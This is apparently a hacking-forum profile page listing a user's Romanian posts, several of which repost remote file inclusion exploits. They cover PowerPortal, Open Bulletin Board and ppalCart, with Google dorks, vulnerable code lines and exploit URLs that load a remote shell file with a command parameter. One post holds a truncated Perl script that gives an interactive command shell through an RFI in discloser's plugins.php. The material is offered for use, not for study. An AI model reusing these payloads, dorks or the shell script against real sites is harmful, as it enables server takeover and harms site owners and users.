zRR
Members-
Posts
45 -
Joined
-
Last visited
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
zRR's Achievements
Newbie (1/14)
10
Reputation
-
OLLYDBG sa traiasca Respect
-
Done http://eskyjets.com/crackMe.JPG
-
Parola la arhiva care este :@ :?
-
am aflat unul dintre bug-urile de luat mail de la ebay
zRR replied to bossjuan's topic in Exploituri
Off toata lumea vrea sa puna cate ceva la V.I.P ....... Daca nu vrei sa apara Public tine pentru tine si nu mai zi nimic..... sau vorba lui Shocker .... vorbeai cu cineva care are acces la V.I.P si rezolvai problema .Asha ce faci bagi in boala pe toata lumea ... .. :@ -
#============================================================================================== # PowerPortal Remote File Include #=============================================================================================== # #Critical Level : Dangerous # # scripts: PowerPortal # download: #Version'>http://www.scripts.com/jump.php?ID=13698 #Version : v1.3a #dork : Powered by PowerPortal v1.3a # note not tested on other version #================================================================================================ #Bug in : #/index.php # #================================================================================================ #Vuln Code : # think #================================================================================================ # #Exploit : # #http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt? # # #================================================================================================ #Discoverd By : v1per-haCker # #Conatact : v1per-hacker[at]hotmail.com #XP10_hackEr Team #Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen #thanx to str0ke #and all members in XP10_hackEr Team #WWW.XP10.COM ================================================================================================== # milw0rm.com [2006-09-29]
-
+-------------------------------------------------------------------- + + Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: Open Bulletin Board 1.0.8 + Venedor ...........: http://www.openbb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Discovered by ..........: Eddy_BAck0o + Contact ...........: l0x3[at]hotmail.com + +-------------------------------------------------------------------- +-------------------------------------------------------------------- + ./index Directory ... ~ [index.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + require $root_path . "base.php"; <--- 30 - 380 + require $root_path . "base.php"; <--- 46 - 380 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=...com/r0x.txt?cmd + +------------------------------------------------------------------- + ~ [collector.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + root_path = "./"; <--- 24 - 194 + require $root_path . "base.php"; <--- 159 - 194 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=...com/r0x.txt?cmd + +------------------------------------------------------------------- + Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ] ;.... +-------------------------------------------------------------------- +--------------------------------------------------------------------
-
Am vazut si eu ........ Sa`u miscat alte nationalitati mai repede ca noiÂÂÂÂ
-
google dork :"powered by: profitCode" exploite: http:///index.php?proMod=http://shell.txt? discoverde by momo26 !!!!!!!!!!!!!!! +-------------------------------------------------------------------- + + ppalCart V(2.5 EE) Remote File Inclusion + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: ppalCart 2.5 EE + Venedor ...........: http://www.profitcode.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: momo26 + Writtin by ..........: Eddy_BAck0o - www.LEzr.com/vB + Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673 + +-------------------------------------------------------------------- +-------------------------------------------------------------------- + ./index Directory ... + [index.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include $docroot . "js/css/shop-custom.php"; +include $docroot . "js/css/shop-default.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 50 - 349 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +else if($proMod) { +include "$proMod" . ".php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 288 - 349 +Ex --> http://www.victom.com/index.php?proMod=htt...com/r0x.txt?cmd + +------------------------------------------------------------------- +------------------------------------------------------------------- + [mainpage.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" . ".php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 158 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "tplates/newitems.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 284 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "tplates/specials.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 287 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "cstmincs/cstmbanner$langFile.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 290 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "tplates/upselladvert.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 292 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "mainincs/upsellproducts.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 298 - 308 +Ex --> http://www.victom.com/mainpage.php?docroot...com/r0x.txt?cmd + +-------------------------------------------------------------------- +Eddy_BAck0o ; +-------------------------------------------------------------------- # milw0rm.com [2006-09-07] SuccesÂÂÂÂ
-
Pai daca este Remote File ce crezi ca poate sa faca ?
-
#!/usr/bin/perl ########################################################################################### # Aria-Security.net Advisory # # Discovered by: Dr.t3rr0r1st # # < www.Aria-security.net > # # Gr33t to:outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp # # Special Thanx To All Aria-Security Users # ########################################################################################### use LWP::UserAgent; print "n === discloser 0.0.4 Remote File Inclusionn"; print "n === Discovered by OutLaw .n"; print "n === http://www.Aria-Security.Netn"; $bPath = $ARGV[0]; $cmdo = $ARGV[1]; $bcmd = $ARGV[2]; if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()} while() { print "[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "n Could not connect !n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[n]/[
-
<div class='quotetop'>QUOTE("Criminal")</div> Exact Forumul
-
Sunt nou ,si chiar imi place Forumul ..... E belea ... Tineti`o asha ca`i bine Respect Tuturor